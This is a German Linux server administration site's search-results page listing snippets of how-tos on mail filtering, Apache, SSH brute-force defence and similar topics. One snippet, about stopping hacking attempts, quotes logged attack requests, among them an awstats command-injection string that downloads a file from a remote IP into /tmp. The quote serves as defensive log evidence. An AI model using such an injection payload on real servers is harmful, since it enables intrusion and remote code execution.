Volltextsuche
55 Suchergebnisse
Seite 1 von 4 Seiten
- Web-Server:
robots.txtSinn der robots.txt Viele Robots/Spider/Crawler/Bots durchsuchen wahllos das Internet nach Inhalten. Manchmal ist es sinnvoll, bestimmte Seiten oder Bereiche der eigenen Site vor diesen Robots zu schützen. Beispiele: Seiten - Traffic:
Traffic über einzelne Ports messenIAM Hier hilft iam (iptables accounting monster) von http://intevation.de/iam/. iam arbeitet (wie der Name sagt) per IPtables und deren Logging funktionen. Es wertet die Logfiles aus und - Downloads:
Logsurfer: Beispiele und surfmailerÜber das Perl-Script logsurfer stößt man häufig im Zusammenhang mit dem IDS Snort.Das logsurferviel mehr kann als nur Logdateien von Snort zu beschnüffeln sieht - Downloads:
Download: Netzwerk-ToolsNützliche Netzwerk-Tools für Windows: netcat für Windows (den meisten Linux-Distributionen liegt eine Version bei). NetCat ist u.a. ein gegenstück zu Telnet. Mit den richtigen Parametern gestartet arbeitet es - Mail-Server » Qmail:
Plesk & Qmail: Integration von ClamAV (für Suse 9.x)Achtung! Neu! Vorher auch folgendes Howto lesen und entscheiden, welcher Weg der bessere für Euch ist: HowTo: Spamassassin und ClamAV unter Plesk einbinden Aus aktuellem Anlass habe ich - Linux-Distributionen » Debian:
Debian Backports nutzenWas ist ein Backport? Debian unterteilt seine Packete in die Zustände stable, testing und unstable. Dabei sind die Packete von stable 'eingefroren'. D.h. (grob gesehen) die - Scripting:
PHP-Scripte auf der Commandozeile / per Cron ausführenProblem: Manche Dinge (Newsletter-Versand, Datenbank-Aktionen, etc.) will man gerne Zeitgesteuert starten. Andere Funktionen möchte man aus Sicherheitsgründen ausserhalb des Web-DocumentRoots verstecken. Oder man will auch Scripte - Web-Server:
suExec/suExec2 neu compilierenProblem: Z.B. bei einem Update von Apache wurde die suexec (suexec2) durch die von Apache mitgelieferte suexec (suexec2) ersetzt.Danach funktioniert kein CGI-Script mehr, weil die neue - Security & Firewalls:
Hacking-Versuche unterbindenProblem: Es wird ständig versucht den Server zu hacken. Z.B. über's Web (es wird aber jeweils ein 404 ausgelöst): "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2 "POST /xmlrpc.php HTTP/1.1" "POST /blog/xmlrpc.php HTTP/1.1" "POST - Security & Firewalls:
SSH-BruteForce-Attacken eindämmenProblem: In den Logfiles stehen ständig Misslungene Einbruchsversuche auf dem SSH-Port. Lösungen: a) SSH-Port verlegen: in sshd_config den Parameter Port oder ListenAddress setzen. b) Per PAM-Modul: pam_abl c) Per - Mail-Server » Qmail:
Plesk & Qmail: Spamprotection mit GreylistingWas macht greylist? Greylisting ist eine effektive Methode zur Spam-Protection. Es block jede Email beim ersten Versuch. Erst wenn diese Email ein zweites Mal eingeliefert werden - Mail-Server » Qmail:
Plesk: Spamassassin und ClamAV per qsheff einbindenDas Orginal stammt aus dem Server-Support-Forum: V-Server Strato Spamassassin + ClamAV HowTo mit Qsheff (Ich veröffentliche es mit freundlicher Genemigung des Autors Dennis Hoofe.Verbessert mit Hilfe vom - Mail-Server:
Fetchmail: "Server-CommonName stimmt nicht überein"Problem:Im Logfile /var/log/fetchmail taucht immer wieder folgender Fehler auf:fetchmail: Server-CommonName stimmt nicht überein: mx.freenet.de != pop3.freenet.de Erklärung:Fetchmail ist offenbar standardmässig auf SSL konfiguriert. D.h. er versucht - Mail-Server:
SpamAssassin: sa-learn per Email fütternACHTUNG: Plesk/Qmail-User finden hier ein angepaßtes HowTo: Plesk: sa-learn per Email füttern SpamAssassin filtert zu wenig Spams Wer SpamAssassin auf seinem Server installiert hat, kennt das: Hin und - Web-Server:
Apache2: Dateien oder ganzes Verzeichnis nicht mitloggenProblem:Man will ein Verzeichnis (z.B. /var/www/domain/verzeichnis/) oder bestimmte Dateien (z.B. *.gif) nicht mehr in den access_log haben.Gründe gibt es dazu viele, wie z.B. das man
[ Weitere ]